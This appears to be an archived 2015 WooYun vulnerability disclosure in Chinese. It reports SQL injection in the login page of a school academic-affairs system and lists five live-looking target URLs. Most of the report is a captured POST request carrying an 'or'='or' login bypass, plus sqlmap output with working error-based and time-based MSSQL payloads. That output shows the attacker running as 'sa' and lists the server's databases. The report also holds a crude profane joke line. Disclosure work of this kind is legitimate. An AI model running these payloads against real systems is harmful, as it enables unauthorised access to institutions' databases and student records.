乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-24: 细节已通知厂商并且等待厂商处理中 2015-03-29: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-05-23: 细节向核心白帽子及相关领域专家公开 2015-06-02: 细节向普通白帽子公开 2015-06-12: 细节向实习白帽子公开 2015-06-27: 细节向公众公开
男:问世间情为何物,只...女:一个大嘴巴子打上去,啪!去你妈逼的程序员还想找女朋友,活该死在代码上.
应乌云要求,五个案例!
http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asphttp://221.232.159.24/dhjw/jwxs/login.asphttp://jiaowu.hustwenhua.net/jwxs/login.asphttp://xscx.cmcedu.cn/jwxs/login.asphttp://jwxt.hycgy.com:5000/jwxs/login.asp
登录的时候抓包
POST /dhjw/jwxs/login.asp HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://221.232.159.24/dhjw/jwxs/login.aspAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: 221.232.159.24Content-Length: 108DNT: 1Connection: Keep-AliveCache-Control: no-cacheCookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJMEdatetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: Account Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVERT(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WHEN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) CHAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1---[13:47:47] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008[13:47:47] [INFO] fetching current useryou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] Y[13:47:49] [INFO] retrieved: sacurrent user: 'sa'[13:47:49] [INFO] fetching current database[13:47:49] [INFO] retrieved: dhjwcurrent database: 'dhjw'[13:47:49] [INFO] fetching database names[13:47:49] [WARNING] reflective value(s) found and filtering out[13:47:49] [WARNING] the SQL query provided does not return any output[13:47:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[13:47:49] [INFO] fetching number of databases[13:47:49] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..[13:47:51] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads[13:47:52] [ERROR] unable to retrieve the number of databases[13:47:52] [INFO] retrieved: dhjw[13:47:52] [INFO] retrieved: master[13:47:52] [INFO] retrieved: tempdb[13:47:53] [INFO] retrieved: model[13:47:53] [INFO] retrieved: msdb[13:47:53] [INFO] retrieved: ReportServer[13:47:53] [INFO] retrieved: ReportServerTempDB[13:47:53] [INFO] retrieved: dhjw[13:47:54] [INFO] retrieved:available databases [7]:[*] dhjw[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[13:47:54] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 23 times[13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\221.232.159.24'[*] shutting down at 13:47:54
你们更专业啦!
危害等级:无影响厂商忽略
忽略时间:2015-06-27 15:30
暂无